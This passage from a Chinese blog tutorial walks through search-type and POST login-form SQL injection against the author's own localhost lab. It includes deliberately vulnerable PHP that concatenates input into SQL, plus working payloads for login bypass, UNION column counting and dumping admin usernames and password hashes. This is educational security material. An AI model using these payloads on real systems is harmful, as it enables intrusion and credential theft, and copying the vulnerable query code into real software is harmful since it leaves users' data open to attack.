<span class="keyword">echo</span> <span class="string">"当前执行sql语句："</span>.$sql;		</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"好像出错了，原因有很多...所以你先去看看你的数据库配置好没。。。"</span>;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>上面可以看到我们php代码里面的两个“%”百分号<br>查询语句将会为：select * from page where title like ‘%%’<br>如果我们在里面加入内容，查询语句将会为：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> page <span class="keyword">where</span> title <span class="keyword">like</span> <span class="string">'%test%'</span>	//查询title=<span class="string">'test'</span>的内容</span><br></pre></td></tr></table></figure></p>
<h3 id="如何突破-1"><a href="#如何突破-1" class="headerlink" title="如何突破"></a>如何突破</h3><p>突破其实也很简单，上面的字符串类型为’’<br>这里的搜索型为’%%’<br>那我们直接利用字符串的思路，将搜索%’闭合<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test%' and '100%'='100</span><br></pre></td></tr></table></figure></p>
<p>那么我们构造执行的语句将会是这样的：<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/search/index.php?x=test%' and '100%'='100</span><br></pre></td></tr></table></figure></p>
<p>语句结果：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">当前执行sql语句：<span class="keyword">select</span> * <span class="keyword">from</span> page <span class="keyword">where</span> title <span class="keyword">like</span> <span class="string">'%test%'</span> <span class="keyword">and</span> <span class="string">'100%'</span>=<span class="string">'100%'</span> 	//正常返回，并且所搜到了<span class="keyword">test</span>的内容，返回了页面内容</span><br></pre></td></tr></table></figure></p>
<p><img src="/image_upload/2018/03/20180402113309.png" alt="Alt text"></p>
<h3 id="构造其他的语句："><a href="#构造其他的语句：" class="headerlink" title="构造其他的语句："></a>构造其他的语句：</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/webpentest/search/index.php?x=test%' and 1=1 order by 4 and '100%'='100  //返回正确，显然order by还是不能用。。。</span><br><span class="line">http://127.0.0.1/webpentest/search/index.php?x=test%' and 1=2 union <span class="keyword">select</span> <span class="number">1</span> <span class="keyword">and</span> <span class="string">'100%'</span>=<span class="string">'100	//错误</span></span><br><span class="line"><span class="string">http://127.0.0.1/webpentest/search/index.php?x=test%'</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span> <span class="keyword">and</span> <span class="string">'100%'</span>=<span class="string">'100	//错误</span></span><br><span class="line"><span class="string">http://127.0.0.1/webpentest/search/index.php?x=test%'</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">and</span> <span class="string">'100%'</span>=<span class="string">'100	//正确，判断出来了3个字段</span></span><br><span class="line"><span class="string">http://127.0.0.1/webpentest/search/index.php?x=test%'</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span> <span class="keyword">and</span> <span class="string">'100%'</span>=<span class="string">'100	//错误</span></span><br><span class="line"><span class="string">http://127.0.0.1/webpentest/search/index.php?x=test%'</span> <span class="keyword">and</span> <span class="number">1</span>=<span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> username,<span class="keyword">password</span>,<span class="number">3</span> <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> <span class="string">'100%'</span>=<span class="string">'100</span></span><br></pre></td></tr></table></figure>
<p>构造其他的语句就简单了<br>但是记得在爆库表爆字段，查询账号密码时记得额将<b>and ‘100%’=’100改为where ‘100%’=’100<b><br><img src="/image_upload/2018/03/20180402114631.png" alt="Alt text"></b></b></p>
<p><br></p>
<hr>
<p><br></p>
<h2 id="提交注入"><a href="#提交注入" class="headerlink" title="提交注入"></a>提交注入</h2><p>两种常见的提交注入：分别是GET和POST<br>GET我们已经在上面说了，比如搜索框，还有就是在网址上，总之前面说到的所有注入全部都是GET型<br>我们可以从前面的php代码中发现这段代码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$id = $_GET[<span class="string">'x'</span>];</span><br></pre></td></tr></table></figure></p>
<p>那么，POST提交当然就是这样写的:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$id = $_POST[<span class="string">'x'</span>];</span><br></pre></td></tr></table></figure></p>
<p>很简单，直接将GET写为POST即可</p>
<h3 id="这两种请求有什么区别？"><a href="#这两种请求有什么区别？" class="headerlink" title="这两种请求有什么区别？"></a>这两种请求有什么区别？</h3><blockquote>
<p>听说这是标准答案：</p>
<ul>
<li>GET在浏览器回退时是无害的，而POST会再次提交请求。</li>
<li>GET产生的URL地址可以被Bookmark，而POST不可以。</li>
<li>GET请求会被浏览器主动cache，而POST不会，除非手动设置。</li>
<li>GET请求只能进行url编码，而POST支持多种编码方式。</li>
<li>GET请求参数会被完整保留在浏览器历史记录里，而POST中的参数不会被保留。</li>
<li>GET请求在URL中传送的参数是有长度限制的，而POST么有。</li>
<li>对参数的数据类型，GET只接受ASCII字符，而POST没有限制。</li>
<li>GET比POST更不安全，因为参数直接暴露在URL上，所以不能用来传递敏感信息。</li>
<li>GET参数通过URL传递，POST放在Request body中。</li>
</ul>
</blockquote>
<blockquote>
<p>有一篇文章<a href="https://mp.weixin.qq.com/s?__biz=MzI3NzIzMzg3Mw==&amp;mid=100000054&amp;idx=1&amp;sn=71f6c214f3833d9ca20b9f7dcd9d33e4#rd" target="_blank" rel="noopener">99%的人理解错 HTTP 中 GET 与 POST 的区别</a>，否定了上述回答：“很遗憾，这不是我们要的回答！”，作者说：<br>GET和POST本质上就是TCP链接，并无差别。但是由于HTTP的规定和浏览器/服务器的限制，导致他们在应用过程中体现出一些不同。 GET和POST还有一个重大区别，简单的说：GET产生一个TCP数据包；POST产生两个TCP数据包。对于GET方式的请求，浏览器会把http header和data一并发送出去，服务器响应200（返回数据）； 而对于POST，浏览器先发送header，服务器响应100 continue，浏览器再发送data，服务器响应200 ok（返回数据）。</p>
</blockquote>
<p>感觉这篇文章还是比较高大上的<br>这里先不扯这么多了，了解了post和get的区别之后我们来看看post提交注入</p>
<h3 id="post提交注入"><a href="#post提交注入" class="headerlink" title="post提交注入"></a>post提交注入</h3><p>还是用前面用过的数据库sqlinstr，但是表用admin表，因为这是登录，需要验证是否登录成功，具体看代码</p>
<p>贴上我的html+php代码：<br>文件名：index.html登录页面<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span>sql注入-POST提交注入-登录框<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">author: smelond</span></span><br><span class="line"><span class="comment">filename: index.php</span></span><br><span class="line"><span class="comment">blog: http://smelond.com</span></span><br><span class="line"><span class="comment">sql注入-POST提交注入-登录框</span></span><br><span class="line"><span class="comment">--&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">div</span> <span class="attr">style</span>=<span class="string">"margin: 0px auto;width: 400px;text-align: center;"</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"index.php"</span> <span class="attr">method</span>=<span class="string">"POST"</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">fieldset</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">legend</span>&gt;</span>登录<span class="tag">&lt;/<span class="name">legend</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"username"</span> <span class="attr">placeholder</span>=<span class="string">"请输入用户名"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"password"</span> <span class="attr">name</span>=<span class="string">"password"</span> <span class="attr">placeholder</span>=<span class="string">"请输入密码"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">				<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">name</span>=<span class="string">"sub"</span> <span class="attr">value</span>=<span class="string">"登录"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;/<span class="name">fieldset</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>文件名：index.php后台页面<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">	&lt;meta charset=<span class="string">"utf-8"</span>&gt;</span><br><span class="line">	&lt;title&gt;sql注入-POST提交注入-后台页面&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;&lt;body&gt;</span><br><span class="line">	&lt;!--</span><br><span class="line">	author: smelond</span><br><span class="line">	filename: index.php</span><br><span class="line">	blog: http:<span class="comment">//smelond.com</span></span><br><span class="line">	sql注入-POST提交注入-后台页面</span><br><span class="line">	--&gt;</span><br><span class="line">&lt;/body&gt;&lt;/html&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$username = $_POST[<span class="string">'username'</span>];</span><br><span class="line">	$password = $_POST[<span class="string">'password'</span>];</span><br><span class="line">	<span class="keyword">if</span> ($username == <span class="string">''</span>) &#123;</span><br><span class="line">		<span class="keyword">exit</span>(<span class="string">"用户名不能为空"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> ($password == <span class="string">''</span>) &#123;</span><br><span class="line">		<span class="keyword">exit</span>(<span class="string">"密码不能为空"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	$password = md5($password);</span><br><span class="line">	<span class="comment">// echo "$password";</span></span><br><span class="line">	$link = mysqli_connect(<span class="string">"127.0.0.1"</span>,<span class="string">"root"</span>,<span class="string">"root"</span>,<span class="string">"sqlinstr"</span>);<span class="comment">//连接sqlinstr数据库</span></span><br><span class="line">	<span class="keyword">if</span> ($link) &#123;<span class="comment">//判断数据库是否存在</span></span><br><span class="line">		mysqli_query($link,<span class="string">"set names utf8"</span>);<span class="comment">//设置编码格式</span></span><br><span class="line">		$sql = <span class="string">"select * from admin where username='$username' and password='$password'"</span>;<span class="comment">//查询</span></span><br><span class="line">		$re = mysqli_query($link,$sql);<span class="comment">//执行查询语句</span></span><br><span class="line">		$data = mysqli_fetch_assoc($re);<span class="comment">//获取数据库返回的内容</span></span><br><span class="line">		<span class="keyword">if</span> ($data) &#123;<span class="comment">//判断是否有返回值</span></span><br><span class="line">			<span class="comment">// var_dump($data);</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"后台页面：&lt;br /&gt;"</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"欢迎你："</span>.$username;</span><br><span class="line">		&#125;<span class="keyword">else</span>&#123;<span class="comment">//否者错误</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"用户名或密码不正确"</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;br /&gt;"</span>.<span class="string">"当前执行sql语句："</span>.$sql;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"好像出错了，原因有很多...所以你先去看看你的数据库配置好没。。。"</span>;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>现在打开我们的url：<br><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">http://127.0.0.1/webpentest/postrequest/index.html</span></span><br></pre></td></tr></table></figure></p>
<p><img src="/image_upload/2018/03/20180402153324.png" alt="Alt text"></p>
<p>看到登录页面已经写好了，试着登录一下<br><img src="/image_upload/2018/03/20180402153636.png" alt="Alt text"><br>登录成功</p>
<p><b>那么怎么绕过，直接登录呢？<b><br>从登陆页面的sql语句中可以看到语句为：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">'smelond'</span> <span class="keyword">and</span> <span class="keyword">password</span>=<span class="string">'efe6398127928f1b2e9ef3207fb82663'</span></span><br></pre></td></tr></table></figure></b></b></p>
<p>想了想，这个语句应该可以直接注释吧？<br>好了，返回index.html页面<br>我们去注释一下<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">账号：smelond<span class="comment">#</span></span><br><span class="line">密码：asdfas</span><br></pre></td></tr></table></figure></p>
<p>发现登录失败<br>看看，我们只是单纯的在用户名后面加上了#号，那么现在语句变成了：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">'smelond</span></span><br></pre></td></tr></table></figure></p>
<p>看看我们构造的语句，明显不完整</p>
<p>那我们来构造一条完整的语句：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">smelond'#	//#号将后面的注释了</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">'smelond'</span>	//所以语句直接变成了这个</span><br></pre></td></tr></table></figure></p>
<p>一般我们会这样写：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">smelond' or 1=1#</span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">'smelond'</span> <span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span></span><br></pre></td></tr></table></figure></p>
<p>页面上显示了欢迎你，我们已经进入后台了<br><img src="/image_upload/2018/03/20180402154954.png" alt="Alt text"></p>
<p>如果后台有查询数据库，那我们可以直接在登录页面将爆库，爆表，爆密码：</p>
<p>那我们将上面的后台代码修改一下，让他有数据库查询，并且回显：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">	&lt;meta charset=<span class="string">"utf-8"</span>&gt;</span><br><span class="line">	&lt;title&gt;sql注入-POST提交注入-后台页面&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;&lt;body&gt;</span><br><span class="line">	&lt;!--</span><br><span class="line">	author: smelond</span><br><span class="line">	filename: index.php</span><br><span class="line">	blog: http:<span class="comment">//smelond.com</span></span><br><span class="line">	sql注入-POST提交注入-后台页面</span><br><span class="line">	--&gt;</span><br><span class="line">&lt;/body&gt;&lt;/html&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$username = $_POST[<span class="string">'username'</span>];</span><br><span class="line">	$password = $_POST[<span class="string">'password'</span>];</span><br><span class="line">	<span class="keyword">if</span> ($username == <span class="string">''</span>) &#123;</span><br><span class="line">		<span class="keyword">exit</span>(<span class="string">"用户名不能为空"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> ($password == <span class="string">''</span>) &#123;</span><br><span class="line">		<span class="keyword">exit</span>(<span class="string">"密码不能为空"</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	$password = md5($password);</span><br><span class="line">	<span class="comment">// echo "$password";</span></span><br><span class="line">	$link = mysqli_connect(<span class="string">"127.0.0.1"</span>,<span class="string">"root"</span>,<span class="string">"root"</span>,<span class="string">"sqlinstr"</span>);<span class="comment">//连接sqlinstr数据库</span></span><br><span class="line">	<span class="keyword">if</span> ($link) &#123;<span class="comment">//判断数据库是否存在</span></span><br><span class="line">		mysqli_query($link,<span class="string">"set names utf8"</span>);<span class="comment">//设置编码格式</span></span><br><span class="line">		$sql = <span class="string">"select * from admin where username='$username' and password='$password'"</span>;<span class="comment">//查询</span></span><br><span class="line">		$re = mysqli_query($link,$sql);<span class="comment">//执行查询语句</span></span><br><span class="line">		$data = mysqli_fetch_assoc($re);<span class="comment">//获取数据库返回的内容</span></span><br><span class="line">		<span class="keyword">if</span> ($data) &#123;<span class="comment">//判断是否有返回值</span></span><br><span class="line">			<span class="comment">// var_dump($data);</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"后台页面：&lt;br /&gt;"</span>;</span><br><span class="line">			<span class="comment">// echo "欢迎你：".$username;</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"欢迎你："</span>.$data[<span class="string">'username'</span>].<span class="string">"&lt;hr /&gt;"</span>; <span class="comment">//我们只修改了这句</span></span><br><span class="line">		&#125;<span class="keyword">else</span>&#123;<span class="comment">//否者错误</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"用户名或密码不正确"</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&lt;br /&gt;"</span>.<span class="string">"当前执行sql语句："</span>.$sql;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"好像出错了，原因有很多...所以你先去看看你的数据库配置好没。。。"</span>;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>上面我们只修改了一句，但是效果就不一样了<br>打开index.html<br>在账号框中输入：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' and 1=2 union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span>#</span><br></pre></td></tr></table></figure></p>
<p><img src="/image_upload/2018/03/20180402161702.png" alt="Alt text"></p>
<p>这个时候，可以看到成功登录，并且用户名为：2<br>注意回显的是2，所以我们在登录框输入时，只能改动2，其他地方改动无效、</p>
<p>接着从新输入：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' and 1=2 union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">database</span>(),<span class="number">3</span> <span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span>#</span><br></pre></td></tr></table></figure></p>
<p>用户名：sqlinstr</p>
<p>这个时候我们输入用concat是最好不过的了<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' and 1=2 union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">concat</span>(<span class="keyword">database</span>(),<span class="string">'---'</span>,<span class="keyword">user</span>(),<span class="string">'---'</span>,<span class="keyword">version</span>()),<span class="number">3</span> <span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span>#</span><br></pre></td></tr></table></figure></p>
<p>用户名：<a href="mailto:sqlinstr---root@localhost---5.5.53" target="_blank" rel="noopener">sqlinstr---root@localhost---5.5.53</a></p>
<p>爆账号密码：<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">asd' and 1=1 union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">concat</span>(username,<span class="string">'--'</span>,<span class="keyword">password</span>),<span class="number">3</span> <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> <span class="number">1</span>=<span class="number">1</span>#asad</span><br></pre></td></tr></table></figure></p>
<p>注意，在简单的查询语句后面不能加and 和 or ，所以我们这里加上了where<br><img src="/image_upload/2018/03/20180402163912.png" alt="Alt text"></p>
<p>好了，差不多了，这个SQL注入类型就先说这么多<del>~</del>~<br>当然，注入里面还有其他的注入，比如：cookie注入，http头注入</p>

      
    </div>
    
    
    

	<div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2018/04/02/sql注入之注入类型/">sql注入之注入类型</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 smelond 的个人博客">smelond</a></p>
  <p><span>发布时间:</span>2018年04月02日 - 08:04</p>
  <p><span>最后更新:</span>2018年04月04日 - 10:04</p>
  <p><span>原始链接:</span><a href="/2018/04/02/sql注入之注入类型/" title="sql注入之注入类型">http://smelond.com/2018/04/02/sql注入之注入类型/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://smelond.com/2018/04/02/sql注入之注入类型/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
      $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
        });
    });  
</script>

      
	</div>
	
	
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" <i class="fa fa-tag"></i> web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/03/28/sql注入之入门/" rel="next" title="sql注入之入门">
                <i class="fa fa-chevron-left"></i> sql注入之入门
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/04/04/sql注入之盲注攻击/" rel="prev" title="sql注入之盲注攻击">
                sql注入之盲注攻击 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
      <!--MOB SHARE BEGIN-->
<div class="-mob-share-ui-button -mob-share-open">分享</div>
<div class="-mob-share-ui" style="display: none">
    <ul class="-mob-share-list">
        <li class="-mob-share-weibo"><p>新浪微博</p></li>
        <li class="-mob-share-tencentweibo"><p>腾讯微博</p></li>
        <li class="-mob-share-qzone"><p>QQ空间</p></li>
        <li class="-mob-share-qq"><p>QQ好友</p></li>
		<li class="-mob-share-weixin"><p>微信</p></li>
        <li class="-mob-share-renren"><p>人人网</p></li>
        <li class="-mob-share-kaixin"><p>开心网</p></li>
        <li class="-mob-share-douban"><p>豆瓣</p></li>
        <li class="-mob-share-facebook"><p>Facebook</p></li>
        <li class="-mob-share-twitter"><p>Twitter</p></li>
    </ul>
    <div class="-mob-share-close">取消</div>
</div>
<div class="-mob-share-ui-bg"></div>
<script id="-mob-share" src="http://f1.webshare.mob.com/code/mob-share.js?appkey=2501104178e4c"></script>
<!--MOB SHARE END-->
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zNTEzOC8xMTY3Mw=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/uploads/avatar.jpg"
                alt="smelond" />
            
              <p class="site-author-name" itemprop="name">smelond</p>
              <p class="site-description motion-element" itemprop="description">徒然</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://www.cnblogs.com/smelond" target="_blank" title="博客园">
                      
                        <i class="fa fa-fw fa-globe"></i>博客园</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-bookmark-o"></i>
                友情链接
              </div>
